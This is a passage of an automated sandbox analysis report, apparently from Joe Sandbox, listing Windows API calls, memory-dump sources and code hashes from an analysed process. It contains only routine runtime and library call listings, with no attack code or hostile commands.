                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _memcmp
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2931989736-0
                                                                                                                                        • Opcode ID: 5688f22c3733e48df28abbfbfad9ad8272e89e5be762e96b655c1fda8af4d39f
                                                                                                                                        • Instruction ID: f2fe3b2d6480f26da4b515f6b238cc9a264c966f419b6e7a183bcae7ca8891a5
                                                                                                                                        • Opcode Fuzzy Hash: 5688f22c3733e48df28abbfbfad9ad8272e89e5be762e96b655c1fda8af4d39f
                                                                                                                                        • Instruction Fuzzy Hash: AF019279B4160ABBE6286914DD82FFA63DCDB21394F4084A0FD049A251F660EE50D3A8
                                                                                                                                        APIs
                                                                                                                                        • GetLastError.KERNEL32(?,?,?,00B4F2DE,00B53863,00BF1444,?,00B3FDF5,?,?,00B2A976,00000010,00BF1440,00B213FC,?,00B213C6), ref: 00B52DFD
                                                                                                                                        • _free.LIBCMT ref: 00B52E32
                                                                                                                                        • _free.LIBCMT ref: 00B52E59
                                                                                                                                        • SetLastError.KERNEL32(00000000,00B21129), ref: 00B52E66
                                                                                                                                        • SetLastError.KERNEL32(00000000,00B21129), ref: 00B52E6F
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: ErrorLast$_free
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3170660625-0
                                                                                                                                        • Opcode ID: ddabc749dda78b97f4d2a7dee9a9de7dd45abed555b6e5dc889a6538a1baaad2
                                                                                                                                        • Instruction ID: 43be4d439c40cfefa4357ca43bb9fbd2aa9f0e4b7a22eb51ec13de882dee647e
                                                                                                                                        • Opcode Fuzzy Hash: ddabc749dda78b97f4d2a7dee9a9de7dd45abed555b6e5dc889a6538a1baaad2
                                                                                                                                        • Instruction Fuzzy Hash: 8201F932107A0067C61267746C87F2B2AE9EFD37A7B2441E9FC21A3292EF709C0E4120
                                                                                                                                        APIs
                                                                                                                                        • CLSIDFromProgID.OLE32(?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B7FF41,80070057,?,?,?,00B8035E), ref: 00B8002B
                                                                                                                                        • ProgIDFromCLSID.OLE32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B7FF41,80070057,?,?), ref: 00B80046
                                                                                                                                        • lstrcmpiW.KERNEL32(?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B7FF41,80070057,?,?), ref: 00B80054
                                                                                                                                        • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B7FF41,80070057,?), ref: 00B80064
                                                                                                                                        • CLSIDFromString.OLE32(?,?,?,?,?,00000000,?,?,?,-C000001E,00000001,?,00B7FF41,80070057,?,?), ref: 00B80070
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: From$Prog$FreeStringTasklstrcmpi
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3897988419-0
                                                                                                                                        • Opcode ID: 3f7223a89fac5bfe4be3b37c28760883ab46c90d6f7ca01a57551fc74b6b92c8
                                                                                                                                        • Instruction ID: 40b82b2470fd5c3960fbb23cc6b7f9b8c0d0ec71067fe53775921a6d1134c22a
                                                                                                                                        • Opcode Fuzzy Hash: 3f7223a89fac5bfe4be3b37c28760883ab46c90d6f7ca01a57551fc74b6b92c8
                                                                                                                                        • Instruction Fuzzy Hash: E3017872610208EFDB51AF68EC44BAA7EEDEF44792F144264F905D7220EBB1DD44DBA0
                                                                                                                                        APIs
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00B8E997
                                                                                                                                        • QueryPerformanceFrequency.KERNEL32(?), ref: 00B8E9A5
                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00B8E9AD
                                                                                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 00B8E9B7
                                                                                                                                        • Sleep.KERNEL32 ref: 00B8E9F3
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: PerformanceQuery$CounterSleep$Frequency
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2833360925-0
                                                                                                                                        • Opcode ID: a0545ee257742b3bf37a30742ce94585f519f34754dad122aaf29fcd815ccb94
                                                                                                                                        • Instruction ID: b3de9a4e333b7aefb648cc0c72d55434a9b8938cbbbb7530b224bdb7121bcb7e
                                                                                                                                        • Opcode Fuzzy Hash: a0545ee257742b3bf37a30742ce94585f519f34754dad122aaf29fcd815ccb94
                                                                                                                                        • Instruction Fuzzy Hash: 7D015731C01629DBCF00EBE8E859AEDBBB8FB08701F000686E552B2260CBB09550CBA1
                                                                                                                                        APIs
                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00B81114
                                                                                                                                        • GetLastError.KERNEL32(?,00000000,00000000,?,?,00B80B9B,?,?,?), ref: 00B81120
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00B80B9B,?,?,?), ref: 00B8112F
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00B80B9B,?,?,?), ref: 00B81136
                                                                                                                                        • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00B8114D
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 842720411-0
                                                                                                                                        • Opcode ID: 62e763c12a545d233e42ea864c2a967f411701166b321f6190abf7f26daecceb
                                                                                                                                        • Instruction ID: 9ff6f7adaf6bec18b7bb00129bb1e8fdbcbffba2627243737b98976bf49767e9
                                                                                                                                        • Opcode Fuzzy Hash: 62e763c12a545d233e42ea864c2a967f411701166b321f6190abf7f26daecceb
                                                                                                                                        • Instruction Fuzzy Hash: 5A016D75101205BFDB119F69DC4DAAA3FAEEF85360B200455FA41E3360DE71DC00CB60
                                                                                                                                        APIs
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 00B80FCA
                                                                                                                                        • GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 00B80FD6
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 00B80FE5
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 00B80FEC
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 00B81002
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                        • Opcode ID: 722c2e0a5d04da7607b1ce51c2e532d312577aeaf4dd616362e073d4096707dc
                                                                                                                                        • Instruction ID: 66c18836298f51871731989b8f7fc42c8d920f1da3e7361235e2d0e8298b06a5
                                                                                                                                        • Opcode Fuzzy Hash: 722c2e0a5d04da7607b1ce51c2e532d312577aeaf4dd616362e073d4096707dc
                                                                                                                                        • Instruction Fuzzy Hash: 5EF0A975201301ABDB21AFA89C49F563FADEF89762F600825FA05E7260CEB0DC40CA60
                                                                                                                                        APIs
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00B8102A
                                                                                                                                        • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 00B81036
                                                                                                                                        • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B81045
                                                                                                                                        • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00B8104C
                                                                                                                                        • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00B81062
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: HeapInformationToken$AllocErrorLastProcess
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 44706859-0
                                                                                                                                        • Opcode ID: 8eb03aa330e114da723fa0a52d80e76c9eac771a89d18fd8883ba6c6fff2f48c
                                                                                                                                        • Instruction ID: b6396b6a7fb3d03ab180a4cf1bc35f024d5170e0925223b307dfd78ef13c6f98
                                                                                                                                        • Opcode Fuzzy Hash: 8eb03aa330e114da723fa0a52d80e76c9eac771a89d18fd8883ba6c6fff2f48c
                                                                                                                                        • Instruction Fuzzy Hash: ACF04975201301ABDB21AFA8EC49F573FADEF89761F600925FA45E7260CEB0D841CA60
                                                                                                                                        APIs
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00B9017D,?,00B932FC,?,00000001,00B62592,?), ref: 00B90324
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00B9017D,?,00B932FC,?,00000001,00B62592,?), ref: 00B90331
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00B9017D,?,00B932FC,?,00000001,00B62592,?), ref: 00B9033E
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00B9017D,?,00B932FC,?,00000001,00B62592,?), ref: 00B9034B
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00B9017D,?,00B932FC,?,00000001,00B62592,?), ref: 00B90358
                                                                                                                                        • CloseHandle.KERNEL32(?,?,?,?,00B9017D,?,00B932FC,?,00000001,00B62592,?), ref: 00B90365
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CloseHandle
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2962429428-0
                                                                                                                                        • Opcode ID: ed560b97a90abf96535a8053e1039bb51da868f69294da7689944cef303f5b21
                                                                                                                                        • Instruction ID: ce21be9711a3eeaf06c1836cec97997260b35459c72de583666ddf94ac3f286f
                                                                                                                                        • Opcode Fuzzy Hash: ed560b97a90abf96535a8053e1039bb51da868f69294da7689944cef303f5b21
                                                                                                                                        • Instruction Fuzzy Hash: AF01EA72814B019FCB30AF6AD880802FBF9FF603053048A3FD19652930C3B0A988CF84
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00B5D752
                                                                                                                                          • Part of subcall function 00B529C8: HeapFree.KERNEL32(00000000,00000000,?,00B5D7D1,00000000,00000000,00000000,00000000,?,00B5D7F8,00000000,00000007,00000000,?,00B5DBF5,00000000), ref: 00B529DE
                                                                                                                                          • Part of subcall function 00B529C8: GetLastError.KERNEL32(00000000,?,00B5D7D1,00000000,00000000,00000000,00000000,?,00B5D7F8,00000000,00000007,00000000,?,00B5DBF5,00000000,00000000), ref: 00B529F0
                                                                                                                                        • _free.LIBCMT ref: 00B5D764
                                                                                                                                        • _free.LIBCMT ref: 00B5D776
                                                                                                                                        • _free.LIBCMT ref: 00B5D788
                                                                                                                                        • _free.LIBCMT ref: 00B5D79A
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: 80a049a91c520a93c44e882215d1ce9a135ceb20a176dd2b6f291486b422974f
                                                                                                                                        • Instruction ID: b004c5b9f7f3927e744e99b73d669f26c26901b1487d54e3ec6f7c9a625c0973
                                                                                                                                        • Opcode Fuzzy Hash: 80a049a91c520a93c44e882215d1ce9a135ceb20a176dd2b6f291486b422974f
                                                                                                                                        • Instruction Fuzzy Hash: D1F06232501248ABC635EB64F9C1E567FDDFB09312BA409D5F858EB602CB30FC848660
                                                                                                                                        APIs
                                                                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00B85C58
                                                                                                                                        • GetWindowTextW.USER32(00000000,?,00000100), ref: 00B85C6F
                                                                                                                                        • MessageBeep.USER32(00000000), ref: 00B85C87
                                                                                                                                        • KillTimer.USER32(?,0000040A), ref: 00B85CA3
                                                                                                                                        • EndDialog.USER32(?,00000001), ref: 00B85CBD
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: BeepDialogItemKillMessageTextTimerWindow
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 3741023627-0
                                                                                                                                        • Opcode ID: 846e9453681f4a0b92e0014f8262ebe04dbaeefecd04b6945df0bd761edaeef3
                                                                                                                                        • Instruction ID: 6191a57d968da15026984b1391824d2fd379570758c806d8a8cc7e27acec6ddf
                                                                                                                                        • Opcode Fuzzy Hash: 846e9453681f4a0b92e0014f8262ebe04dbaeefecd04b6945df0bd761edaeef3
                                                                                                                                        • Instruction Fuzzy Hash: 06011270500B04ABEB31AB10DD4EFA67BF8FB04B05F041699A583A24E1DBF4A984CF90
                                                                                                                                        APIs
                                                                                                                                        • _free.LIBCMT ref: 00B522BE
                                                                                                                                          • Part of subcall function 00B529C8: HeapFree.KERNEL32(00000000,00000000,?,00B5D7D1,00000000,00000000,00000000,00000000,?,00B5D7F8,00000000,00000007,00000000,?,00B5DBF5,00000000), ref: 00B529DE
                                                                                                                                          • Part of subcall function 00B529C8: GetLastError.KERNEL32(00000000,?,00B5D7D1,00000000,00000000,00000000,00000000,?,00B5D7F8,00000000,00000007,00000000,?,00B5DBF5,00000000,00000000), ref: 00B529F0
                                                                                                                                        • _free.LIBCMT ref: 00B522D0
                                                                                                                                        • _free.LIBCMT ref: 00B522E3
                                                                                                                                        • _free.LIBCMT ref: 00B522F4
                                                                                                                                        • _free.LIBCMT ref: 00B52305
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 776569668-0
                                                                                                                                        • Opcode ID: d92f90b19afcaee910c96a2324bc7a7bd935596bad337cc799ae9614ace829cf
                                                                                                                                        • Instruction ID: c11c73d400358a6a605ff297396d7f4d03b5e3dd148a1cb6cf1309ca96990009
                                                                                                                                        • Opcode Fuzzy Hash: d92f90b19afcaee910c96a2324bc7a7bd935596bad337cc799ae9614ace829cf
                                                                                                                                        • Instruction Fuzzy Hash: A3F054754121109F8612BF98BC419683FE4F729752B0009D6F810E7372CF314416DFE4
                                                                                                                                        APIs
                                                                                                                                        • EndPath.GDI32(?), ref: 00B395D4
                                                                                                                                        • StrokeAndFillPath.GDI32(?,?,00B771F7,00000000,?,?,?), ref: 00B395F0
                                                                                                                                        • SelectObject.GDI32(?,00000000), ref: 00B39603
                                                                                                                                        • DeleteObject.GDI32 ref: 00B39616
                                                                                                                                        • StrokePath.GDI32(?), ref: 00B39631
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: Path$ObjectStroke$DeleteFillSelect
                                                                                                                                        • String ID:
                                                                                                                                        • API String ID: 2625713937-0
                                                                                                                                        • Opcode ID: 584143de4d725f7c92eefafdcc05e5cd57d8ac0409efa74eff6ade1647e0f4fe
                                                                                                                                        • Instruction ID: f4d5ec9842c9e16706a3189db1e73dc04de2edd7488cbe71d879486bcf649298
                                                                                                                                        • Opcode Fuzzy Hash: 584143de4d725f7c92eefafdcc05e5cd57d8ac0409efa74eff6ade1647e0f4fe
                                                                                                                                        • Instruction Fuzzy Hash: 19F0F630006204EBDB12AF69ED187793FA5EB10322F148A54E865670F1CFF08992DFA0
                                                                                                                                        APIs
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: __freea$_free
                                                                                                                                        • String ID: a/p$am/pm
                                                                                                                                        • API String ID: 3432400110-3206640213
                                                                                                                                        • Opcode ID: 08fd5b049bf185a772d3619a1db1ed58713194cffbc773b2b3da949329e6d751
                                                                                                                                        • Instruction ID: b750e6728954accd62b554c9cbf30e29f1c488fc1276b0f0d98ab2f680483c72
                                                                                                                                        • Opcode Fuzzy Hash: 08fd5b049bf185a772d3619a1db1ed58713194cffbc773b2b3da949329e6d751
                                                                                                                                        • Instruction Fuzzy Hash: 92D10431900246EADB249F6CC8A5BFAB7F0EF05702F1849D9ED01AB650D3759D88CB65
                                                                                                                                        APIs
                                                                                                                                          • Part of subcall function 00B40242: EnterCriticalSection.KERNEL32(00BF070C,00BF1884,?,?,00B3198B,00BF2518,?,?,?,00B212F9,00000000), ref: 00B4024D
                                                                                                                                          • Part of subcall function 00B40242: LeaveCriticalSection.KERNEL32(00BF070C,?,00B3198B,00BF2518,?,?,?,00B212F9,00000000), ref: 00B4028A
                                                                                                                                          • Part of subcall function 00B29CB3: _wcslen.LIBCMT ref: 00B29CBD
                                                                                                                                          • Part of subcall function 00B400A3: __onexit.LIBCMT ref: 00B400A9
                                                                                                                                        • __Init_thread_footer.LIBCMT ref: 00BA7BFB
                                                                                                                                          • Part of subcall function 00B401F8: EnterCriticalSection.KERNEL32(00BF070C,?,?,00B38747,00BF2514), ref: 00B40202
                                                                                                                                          • Part of subcall function 00B401F8: LeaveCriticalSection.KERNEL32(00BF070C,?,00B38747,00BF2514), ref: 00B40235
                                                                                                                                        Strings
                                                                                                                                        Memory Dump Source
                                                                                                                                        • Source File: 00000006.00000002.2950242807.0000000000B21000.00000020.00000001.01000000.00000009.sdmp, Offset: 00B20000, based on PE: true
                                                                                                                                        • Associated: 00000006.00000002.2950188718.0000000000B20000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BBC000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950379797.0000000000BE2000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950684617.0000000000BEC000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        • Associated: 00000006.00000002.2950807828.0000000000BF4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                        • Snapshot File: hcaresult_6_2_b20000_84d280a9e8.jbxd
                                                                                                                                        Similarity
                                                                                                                                        • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                                                                                        • String ID: 5$G$Variable must be of type 'Object'.
                                                                                                                                        • API String ID: 535116098-3733170431
                                                                                                                                        • Opcode ID: b0da8ff41a920a46a40b81c5ce7e3b431a6a837aa27b02cf3b4fbff1e893f7e7
                                                                                                                                        • Instruction ID: bdf3e823a23ed13c0ee7592dea42882a0b5d731272b14ab868d4e9d01087f22b
                                                                                                                                        • Opcode Fuzzy Hash: b0da8ff41a920a46a40b81c5ce7e3b431a6a837aa27b02cf3b4fbff1e893f7e7
